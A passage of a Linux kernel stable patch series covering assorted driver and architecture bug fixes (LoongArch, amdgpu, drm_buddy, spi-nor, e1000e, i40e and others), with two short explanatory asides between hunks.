+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+ 		c->options |= LOONGARCH_CPU_UAL;
+ 		elf_hwcap |= HWCAP_LOONGARCH_UAL;
+ 	}
++	if (config & CPUCFG1_CRC32) {
++		c->options |= LOONGARCH_CPU_CRC32;
++		elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	}
++
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG2);
+ 	if (config & CPUCFG2_LAM) {
+diff --git a/arch/loongarch/kernel/proc.c b/arch/loongarch/kernel/proc.c
+index 5c67cc4fd56d5..0d82907b5404c 100644
+--- a/arch/loongarch/kernel/proc.c
++++ b/arch/loongarch/kernel/proc.c
+@@ -76,6 +76,7 @@ static int show_cpuinfo(struct seq_file *m, void *v)
+ 	if (cpu_has_fpu)	seq_printf(m, " fpu");
+ 	if (cpu_has_lsx)	seq_printf(m, " lsx");
+ 	if (cpu_has_lasx)	seq_printf(m, " lasx");
++	if (cpu_has_crc32)	seq_printf(m, " crc32");
+ 	if (cpu_has_complex)	seq_printf(m, " complex");
+ 	if (cpu_has_crypto)	seq_printf(m, " crypto");
+ 	if (cpu_has_lvz)	seq_printf(m, " lvz");
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index 080061793c859..c7e9c96719fa3 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -41,7 +41,7 @@
+  * don't have to care about aliases on other CPUs.
+  */
+ unsigned long empty_zero_page, zero_page_mask;
+-EXPORT_SYMBOL_GPL(empty_zero_page);
++EXPORT_SYMBOL(empty_zero_page);
+ EXPORT_SYMBOL(zero_page_mask);
+ 
+ void setup_zero_pages(void)
+@@ -231,7 +231,7 @@ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+-EXPORT_SYMBOL_GPL(invalid_pmd_table);
++EXPORT_SYMBOL(invalid_pmd_table);
+ #endif
+ pte_t invalid_pte_table[PTRS_PER_PTE] __page_aligned_bss;
+ EXPORT_SYMBOL(invalid_pte_table);
+diff --git a/arch/mips/kernel/vmlinux.lds.S b/arch/mips/kernel/vmlinux.lds.S
+index 1f98947fe715d..91d6a5360bb9c 100644
+--- a/arch/mips/kernel/vmlinux.lds.S
++++ b/arch/mips/kernel/vmlinux.lds.S
+@@ -15,6 +15,8 @@
+ #define EMITS_PT_NOTE
+ #endif
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #include <asm-generic/vmlinux.lds.h>
+ 
+ #undef mips
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index dd58e1d993972..659e21862077b 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -74,9 +74,7 @@ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_ctype.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_ctype.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_entry.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memcpy.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memset.o		+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 53e0209229f87..092b16b4dd4f6 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -474,9 +474,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned long __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned long __user *)data);
+ 	case PTRACE_ENABLE_TE:
+ 		if (!MACHINE_HAS_TE)
+ 			return -EIO;
+@@ -824,9 +822,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned int __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned int __user *)data);
+ 	}
+ 	return compat_ptrace_request(child, request, addr, data);
+ }
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 17f09dc263811..82fec66d46d29 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -69,8 +69,7 @@ CFLAGS_sha256.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_string.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_setup-x86_$(BITS).o	+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_entry64.o			+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 727704431f618..13918c8c839ea 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -360,7 +360,6 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 	bridge->dev.parent = parent;
+ 	bridge->dev.of_node = parent->of_node;
+ 	bridge->dev.id = id;
+-	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
+ 
+ 	ret = dev_set_name(&bridge->dev, "br%d", id);
+ 	if (ret)
+@@ -372,6 +371,8 @@ fpga_bridge_register(struct device *parent, const char *name,
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	of_platform_populate(bridge->dev.of_node, NULL, NULL, &bridge->dev);
++
+ 	return bridge;
+ 
+ error_device:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index 89011bae7588e..ca5dc51600fac 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -653,6 +653,9 @@ int amdgpu_irq_put(struct amdgpu_device *adev, struct amdgpu_irq_src *src,
+ 	if (!src->enabled_types || !src->funcs->set)
+ 		return -EINVAL;
+ 
++	if (WARN_ON(!amdgpu_irq_enabled(adev, src, type)))
++		return -EINVAL;
++
+ 	if (atomic_dec_and_test(&src->enabled_types[type]))
+ 		return amdgpu_irq_update(adev, src, type);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index ce64ca1c6e669..5c1193dd7d88c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/module.h>
++#include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/debugfs.h>
+ #include <drm/drm_drv.h>
+@@ -84,6 +85,7 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ {
+ 	unsigned long bo_size;
+ 	const char *fw_name;
++	const char *bios_ver;
+ 	const struct common_firmware_header *hdr;
+ 	unsigned char fw_check;
+ 	unsigned int fw_shared_size, log_offset;
+@@ -159,6 +161,21 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		if ((adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) &&
+ 		    (adev->pg_flags & AMD_PG_SUPPORT_VCN_DPG))
+ 			adev->vcn.indirect_sram = true;
++		/*
++		 * Some Steam Deck's BIOS versions are incompatible with the
++		 * indirect SRAM mode, leading to amdgpu being unable to get
++		 * properly probed (and even potentially crashing the kernel).
++		 * Hence, check for these versions here - notice this is
++		 * restricted to Vangogh (Deck's APU).
++		 */
++		bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
++
++		if (bios_ver && (!strncmp("F7A0113", bios_ver, 7) ||
++		     !strncmp("F7A0114", bios_ver, 7))) {
++			adev->vcn.indirect_sram = false;
++			dev_info(adev->dev,
++				"Steam Deck quirk: indirect SRAM disabled on BIOS %s\n", bios_ver);
++		}
+ 		break;
+ 	case IP_VERSION(3, 0, 16):
+ 		fw_name = FIRMWARE_DIMGREY_CAVEFISH;
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index b87f50e8fa615..1ec643a0d00d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -167,10 +167,21 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (rc)
+ 		return rc;
+ 
+-	irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++	if (amdgpu_in_reset(adev)) {
++		irq_source = IRQ_TYPE_VBLANK + acrtc->otg_inst;
++		/* During gpu-reset we disable and then enable vblank irq, so
++		 * don't use amdgpu_irq_get/put() to avoid refcount change.
++		 */
++		if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
++			rc = -EBUSY;
++	} else {
++		rc = (enable)
++			? amdgpu_irq_get(adev, &adev->crtc_irq, acrtc->crtc_id)
++			: amdgpu_irq_put(adev, &adev->crtc_irq, acrtc->crtc_id);
++	}
+ 
+-	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+-		return -EBUSY;
++	if (rc)
++		return rc;
+ 
+ skip:
+ 	if (amdgpu_in_reset(adev))
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+index 7dd0845d1bd9f..8e416433184cf 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/dcn31_fpu.c
+@@ -222,7 +222,7 @@ struct _vcs_dpi_ip_params_st dcn3_15_ip = {
+ 	.maximum_dsc_bits_per_component = 10,
+ 	.dsc422_native_support = false,
+ 	.is_line_buffer_bpp_fixed = true,
+-	.line_buffer_fixed_bpp = 49,
++	.line_buffer_fixed_bpp = 48,
+ 	.line_buffer_size_bits = 789504,
+ 	.max_line_buffer_lines = 12,
+ 	.writeback_interface_buffer_size_kbytes = 90,
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 3d1f50f481cfd..7098f125b54a9 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -146,8 +146,8 @@ int drm_buddy_init(struct drm_buddy *mm, u64 size, u64 chunk_size)
+ 		unsigned int order;
+ 		u64 root_size;
+ 
+-		root_size = rounddown_pow_of_two(size);
+-		order = ilog2(root_size) - ilog2(chunk_size);
++		order = ilog2(size) - ilog2(chunk_size);
++		root_size = chunk_size << order;
+ 
+ 		root = drm_block_alloc(mm, NULL, order, offset);
+ 		if (!root)
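
Together with the drm_buddy_test hunk below, the point is that rounddown_pow_of_two() operates on unsigned long, so a u64 size is silently truncated on 32-bit; computing the order first and deriving root_size = chunk_size << order keeps everything in 64 bits. A standalone sketch of the arithmetic, with example sizes:

#include <stdio.h>
#include <stdint.h>

/* Portable ilog2 for u64: index of the highest set bit. */
static unsigned int ilog2_u64(uint64_t v)
{
	unsigned int r = 0;

	while (v >>= 1)
		r++;
	return r;
}

int main(void)
{
	uint64_t size = 8ULL << 30;	/* 8 GiB region (example value) */
	uint64_t chunk = 4096;		/* minimum block size */

	/* On a 32-bit kernel, rounddown_pow_of_two(size) would operate
	 * on a 32-bit unsigned long, truncating 8 GiB to 0 first. */
	printf("truncated to 32 bits: %u\n", (uint32_t)size);

	/* Fixed scheme: 64-bit ilog2 first, size derived from order. */
	unsigned int order = ilog2_u64(size) - ilog2_u64(chunk);
	uint64_t root_size = chunk << order;

	printf("order=%u root_size=%llu\n",
	       order, (unsigned long long)root_size);
	return 0;
}
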
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_aux.c b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+index 48c375c65a418..7f3f2d50e6cde 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_aux.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_aux.c
+@@ -165,7 +165,7 @@ static u32 skl_get_aux_send_ctl(struct intel_dp *intel_dp,
+ 	      DP_AUX_CH_CTL_TIME_OUT_MAX |
+ 	      DP_AUX_CH_CTL_RECEIVE_ERROR |
+ 	      (send_bytes << DP_AUX_CH_CTL_MESSAGE_SIZE_SHIFT) |
+-	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(32) |
++	      DP_AUX_CH_CTL_FW_SYNC_PULSE_SKL(24) |
+ 	      DP_AUX_CH_CTL_SYNC_PULSE_SKL(32);
+ 
+ 	if (intel_tc_port_in_tbt_alt_mode(dig_port))
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 8cecf81a5ae03..3c05ce01f73b8 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -840,6 +840,8 @@ static void vop2_enable(struct vop2 *vop2)
+ 		return;
+ 	}
+ 
++	regcache_sync(vop2->map);
++
+ 	if (vop2->data->soc_id == 3566)
+ 		vop2_writel(vop2, RK3568_OTP_WIN_EN, 1);
+ 
+@@ -868,6 +870,8 @@ static void vop2_disable(struct vop2 *vop2)
+ 
+ 	pm_runtime_put_sync(vop2->dev);
+ 
++	regcache_mark_dirty(vop2->map);
++
+ 	clk_disable_unprepare(vop2->aclk);
+ 	clk_disable_unprepare(vop2->hclk);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_buddy_test.c b/drivers/gpu/drm/tests/drm_buddy_test.c
+index 62f69589a72d3..a699fc0dc8579 100644
+--- a/drivers/gpu/drm/tests/drm_buddy_test.c
++++ b/drivers/gpu/drm/tests/drm_buddy_test.c
+@@ -89,7 +89,8 @@ static int check_block(struct kunit *test, struct drm_buddy *mm,
+ 		err = -EINVAL;
+ 	}
+ 
+-	if (!is_power_of_2(block_size)) {
++	/* We can't use is_power_of_2() for a u64 on 32-bit systems. */
++	if (block_size & (block_size - 1)) {
+ 		kunit_err(test, "block size not power of two\n");
+ 		err = -EINVAL;
+ 	}
+diff --git a/drivers/iio/adc/at91-sama5d2_adc.c b/drivers/iio/adc/at91-sama5d2_adc.c
+index 870f4cb609237..3ad5678f26135 100644
+--- a/drivers/iio/adc/at91-sama5d2_adc.c
++++ b/drivers/iio/adc/at91-sama5d2_adc.c
+@@ -1409,7 +1409,7 @@ static struct iio_trigger *at91_adc_allocate_trigger(struct iio_dev *indio,
+ 	trig = devm_iio_trigger_alloc(&indio->dev, "%s-dev%d-%s", indio->name,
+ 				iio_device_id(indio), trigger_name);
+ 	if (!trig)
+-		return NULL;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	trig->dev.parent = indio->dev.parent;
+ 	iio_trigger_set_drvdata(trig, indio);
+diff --git a/drivers/iio/dac/ad5755.c b/drivers/iio/dac/ad5755.c
+index beadfa938d2da..404865e354602 100644
+--- a/drivers/iio/dac/ad5755.c
++++ b/drivers/iio/dac/ad5755.c
+@@ -802,6 +802,7 @@ static struct ad5755_platform_data *ad5755_parse_fw(struct device *dev)
+ 	return pdata;
+ 
+  error_out:
++	fwnode_handle_put(pp);
+ 	devm_kfree(dev, pdata);
+ 	return NULL;
+ }
+diff --git a/drivers/iio/light/tsl2772.c b/drivers/iio/light/tsl2772.c
+index dd9051f1cc1a0..13a6c3d078616 100644
+--- a/drivers/iio/light/tsl2772.c
++++ b/drivers/iio/light/tsl2772.c
+@@ -601,6 +601,7 @@ static int tsl2772_read_prox_diodes(struct tsl2772_chip *chip)
+ 			return -EINVAL;
+ 		}
+ 	}
++	chip->settings.prox_diode = prox_diode_mask;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/tablet/pegasus_notetaker.c b/drivers/input/tablet/pegasus_notetaker.c
+index d836d3dcc6a24..a68da2988f9cd 100644
+--- a/drivers/input/tablet/pegasus_notetaker.c
++++ b/drivers/input/tablet/pegasus_notetaker.c
+@@ -296,6 +296,12 @@ static int pegasus_probe(struct usb_interface *intf,
+ 	pegasus->intf = intf;
+ 
+ 	pipe = usb_rcvintpipe(dev, endpoint->bEndpointAddress);
++	/* Sanity check that pipe's type matches endpoint's type */
++	if (usb_pipe_type_check(dev, pipe)) {
++		error = -EINVAL;
++		goto err_free_mem;
++	}
++
+ 	pegasus->data_len = usb_maxpacket(dev, pipe);
+ 
+ 	pegasus->data = usb_alloc_coherent(dev, pegasus->data_len, GFP_KERNEL,
+diff --git a/drivers/memstick/core/memstick.c b/drivers/memstick/core/memstick.c
+index 660df7d269fac..d410e2e78a3d3 100644
+--- a/drivers/memstick/core/memstick.c
++++ b/drivers/memstick/core/memstick.c
+@@ -410,6 +410,7 @@ static struct memstick_dev *memstick_alloc_card(struct memstick_host *host)
+ 	return card;
+ err_out:
+ 	host->card = old_card;
++	kfree_const(card->dev.kobj.name);
+ 	kfree(card);
+ 	return NULL;
+ }
+@@ -468,8 +469,10 @@ static void memstick_check(struct work_struct *work)
+ 				put_device(&card->dev);
+ 				host->card = NULL;
+ 			}
+-		} else
++		} else {
++			kfree_const(card->dev.kobj.name);
+ 			kfree(card);
++		}
+ 	}
+ 
+ out_power_off:
+diff --git a/drivers/mmc/host/sdhci_am654.c b/drivers/mmc/host/sdhci_am654.c
+index 101581d83982a..8e22b375247ef 100644
+--- a/drivers/mmc/host/sdhci_am654.c
++++ b/drivers/mmc/host/sdhci_am654.c
+@@ -351,8 +351,6 @@ static void sdhci_am654_write_b(struct sdhci_host *host, u8 val, int reg)
+ 		 */
+ 		case MMC_TIMING_SD_HS:
+ 		case MMC_TIMING_MMC_HS:
+-		case MMC_TIMING_UHS_SDR12:
+-		case MMC_TIMING_UHS_SDR25:
+ 			val &= ~SDHCI_CTRL_HISPD;
+ 		}
+ 	}
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index cda57cb863089..75e694791d8d9 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -3272,7 +3272,19 @@ static struct spi_mem_driver spi_nor_driver = {
+ 	.remove = spi_nor_remove,
+ 	.shutdown = spi_nor_shutdown,
+ };
+-module_spi_mem_driver(spi_nor_driver);
++
++static int __init spi_nor_module_init(void)
++{
++	return spi_mem_driver_register(&spi_nor_driver);
++}
++module_init(spi_nor_module_init);
++
++static void __exit spi_nor_module_exit(void)
++{
++	spi_mem_driver_unregister(&spi_nor_driver);
++	spi_nor_debugfs_shutdown();
++}
++module_exit(spi_nor_module_exit);
+ 
+ MODULE_LICENSE("GPL v2");
+ MODULE_AUTHOR("Huang Shijie <shijie8@gmail.com>");
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index d18dafeb020ab..00bf0d0e955a0 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -709,8 +709,10 @@ static inline struct spi_nor *mtd_to_spi_nor(struct mtd_info *mtd)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ void spi_nor_debugfs_register(struct spi_nor *nor);
++void spi_nor_debugfs_shutdown(void);
+ #else
+ static inline void spi_nor_debugfs_register(struct spi_nor *nor) {}
++static inline void spi_nor_debugfs_shutdown(void) {}
+ #endif
+ 
+ #endif /* __LINUX_MTD_SPI_NOR_INTERNAL_H */
+diff --git a/drivers/mtd/spi-nor/debugfs.c b/drivers/mtd/spi-nor/debugfs.c
+index df76cb5de3f93..5f56b23205d8b 100644
+--- a/drivers/mtd/spi-nor/debugfs.c
++++ b/drivers/mtd/spi-nor/debugfs.c
+@@ -226,13 +226,13 @@ static void spi_nor_debugfs_unregister(void *data)
+ 	nor->debugfs_root = NULL;
+ }
+ 
++static struct dentry *rootdir;
++
+ void spi_nor_debugfs_register(struct spi_nor *nor)
+ {
+-	struct dentry *rootdir, *d;
++	struct dentry *d;
+ 	int ret;
+ 
+-	/* Create rootdir once. Will never be deleted again. */
+-	rootdir = debugfs_lookup(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 	if (!rootdir)
+ 		rootdir = debugfs_create_dir(SPI_NOR_DEBUGFS_ROOT, NULL);
+ 
+@@ -247,3 +247,8 @@ void spi_nor_debugfs_register(struct spi_nor *nor)
+ 	debugfs_create_file("capabilities", 0444, d, nor,
+ 			    &spi_nor_capabilities_fops);
+ }
++
++void spi_nor_debugfs_shutdown(void)
++{
++	debugfs_remove(rootdir);
++}
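
The root cause here is rootdir lifetime: debugfs_lookup() took a reference that was never dropped, and the directory outlived the module. Caching the dentry and removing it from a real module_exit handler, as the patch does, is the usual shape; a minimal self-contained sketch with hypothetical names:

#include <linux/debugfs.h>
#include <linux/module.h>

static struct dentry *example_root;

static int __init example_init(void)
{
	/* Created once; no debugfs_lookup(), so no stray reference. */
	example_root = debugfs_create_dir("example", NULL);
	return 0;
}
module_init(example_init);

static void __exit example_exit(void)
{
	debugfs_remove(example_root);	/* removes the dir and its children */
	example_root = NULL;
}
module_exit(example_exit);

MODULE_LICENSE("GPL");
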
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9f6824a6537bc..9f44c86a591dd 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1776,14 +1776,15 @@ void bond_lower_state_changed(struct slave *slave)
+ 
+ /* The bonding driver uses ether_setup() to convert a master bond device
+  * to ARPHRD_ETHER, that resets the target netdevice's flags so we always
+- * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE if it was set
++ * have to restore the IFF_MASTER flag, and only restore IFF_SLAVE and IFF_UP
++ * if they were set
+  */
+ static void bond_ether_setup(struct net_device *bond_dev)
+ {
+-	unsigned int slave_flag = bond_dev->flags & IFF_SLAVE;
++	unsigned int flags = bond_dev->flags & (IFF_SLAVE | IFF_UP);
+ 
+ 	ether_setup(bond_dev);
+-	bond_dev->flags |= IFF_MASTER | slave_flag;
++	bond_dev->flags |= IFF_MASTER | flags;
+ 	bond_dev->priv_flags &= ~IFF_TX_SKB_SHARING;
+ }
+ 
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index 70887e0aece33..d9434ed9450df 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -216,6 +216,18 @@ static int b53_mmap_write64(struct b53_device *dev, u8 page, u8 reg,
+ 	return 0;
+ }
+ 
++static int b53_mmap_phy_read16(struct b53_device *dev, int addr, int reg,
++			       u16 *value)
++{
++	return -EIO;
++}
++
++static int b53_mmap_phy_write16(struct b53_device *dev, int addr, int reg,
++				u16 value)
++{
++	return -EIO;
++}
++
+ static const struct b53_io_ops b53_mmap_ops = {
+ 	.read8 = b53_mmap_read8,
+ 	.read16 = b53_mmap_read16,
+@@ -227,6 +239,8 @@ static const struct b53_io_ops b53_mmap_ops = {
+ 	.write32 = b53_mmap_write32,
+ 	.write48 = b53_mmap_write48,
+ 	.write64 = b53_mmap_write64,
++	.phy_read16 = b53_mmap_phy_read16,
++	.phy_write16 = b53_mmap_phy_write16,
+ };
+ 
+ static int b53_mmap_probe_of(struct platform_device *pdev,
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index c6e36603bd2db..e3e5a427222f6 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -7597,7 +7597,7 @@ static int __bnxt_hwrm_ptp_qcfg(struct bnxt *bp)
+ 	u8 flags;
+ 	int rc;
+ 
+-	if (bp->hwrm_spec_code < 0x10801) {
++	if (bp->hwrm_spec_code < 0x10801 || !BNXT_CHIP_P5_THOR(bp)) {
+ 		rc = -ENODEV;
+ 		goto no_ptp;
+ 	}
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index 55cf2f62bb308..db8e06157da29 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -5293,31 +5293,6 @@ static void e1000_watchdog_task(struct work_struct *work)
+ 				ew32(TARC(0), tarc0);
+ 			}
+ 
+-			/* disable TSO for pcie and 10/100 speeds, to avoid
+-			 * some hardware issues
+-			 */
+-			if (!(adapter->flags & FLAG_TSO_FORCE)) {
+-				switch (adapter->link_speed) {
+-				case SPEED_10:
+-				case SPEED_100:
+-					e_info("10/100 speed: disabling TSO\n");
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-					break;
+-				case SPEED_1000:
+-					netdev->features |= NETIF_F_TSO;
+-					netdev->features |= NETIF_F_TSO6;
+-					break;
+-				default:
+-					/* oops */
+-					break;
+-				}
+-				if (hw->mac.type == e1000_pch_spt) {
+-					netdev->features &= ~NETIF_F_TSO;
+-					netdev->features &= ~NETIF_F_TSO6;
+-				}
+-			}
+-
+ 			/* enable transmits in the hardware, need to do this
+ 			 * after setting TARC(0)
+ 			 */
+@@ -7532,6 +7507,32 @@ static int e1000_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    NETIF_F_RXCSUM |
+ 			    NETIF_F_HW_CSUM);
+ 
++	/* disable TSO for pcie and 10/100 speeds to avoid
++	 * some hardware issues and for i219 to fix transfer
++	 * speed being capped at 60%
++	 */
++	if (!(adapter->flags & FLAG_TSO_FORCE)) {
++		switch (adapter->link_speed) {
++		case SPEED_10:
++		case SPEED_100:
++			e_info("10/100 speed: disabling TSO\n");
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++			break;
++		case SPEED_1000:
++			netdev->features |= NETIF_F_TSO;
++			netdev->features |= NETIF_F_TSO6;
++			break;
++		default:
++			/* oops */
++			break;
++		}
++		if (hw->mac.type == e1000_pch_spt) {
++			netdev->features &= ~NETIF_F_TSO;
++			netdev->features &= ~NETIF_F_TSO6;
++		}
++	}
++
+ 	/* Set user-changeable features (subset of all device features) */
+ 	netdev->hw_features = netdev->features;
+ 	netdev->hw_features |= NETIF_F_RXFCS;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index da0cf87d3a1ca..68f390ce4f6e2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -11058,8 +11058,11 @@ static void i40e_rebuild(struct i40e_pf *pf, bool reinit, bool lock_acquired)
+ 					     pf->hw.aq.asq_last_status));
+ 	}
+ 	/* reinit the misc interrupt */
+-	if (pf->flags & I40E_FLAG_MSIX_ENABLED)
++	if (pf->flags & I40E_FLAG_MSIX_ENABLED) {
+ 		ret = i40e_setup_misc_vector(pf);
++		if (ret)
++			goto end_unlock;
++	}
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -14098,15 +14101,15 @@ static int i40e_add_vsi(struct i40e_vsi *vsi)
+ 		vsi->id = ctxt.vsi_number;
+ 	}
+ 
+-	vsi->active_filters = 0;
+-	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
++	vsi->active_filters = 0;
+ 	/* If macvlan filters already exist, force them to get loaded */
+ 	hash_for_each_safe(vsi->mac_filter_hash, bkt, h, f, hlist) {
+ 		f->state = I40E_FILTER_NEW;
+ 		f_count++;
+ 	}
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
++	clear_bit(__I40E_VSI_OVERFLOW_PROMISC, vsi->state);
+ 
+ 	if (f_count) {
+ 		vsi->flags |= I40E_VSI_FLAG_FILTER_CHANGED;
+diff --git a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+index 017d68f1e1232..972c571b41587 100644
+--- a/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
++++ b/drivers/net/ethernet/mellanox/mlxfw/mlxfw_mfa2_tlv_multi.c
+@@ -31,6 +31,8 @@ mlxfw_mfa2_tlv_next(const struct mlxfw_mfa2_file *mfa2_file,
+ 
+ 	if (tlv->type == MLXFW_MFA2_TLV_MULTI_PART) {
+ 		multi = mlxfw_mfa2_tlv_multi_get(mfa2_file, tlv);
++		if (!multi)
++			return NULL;
+ 		tlv_len = NLA_ALIGN(tlv_len + be16_to_cpu(multi->total_len));
+ 	}
+ 
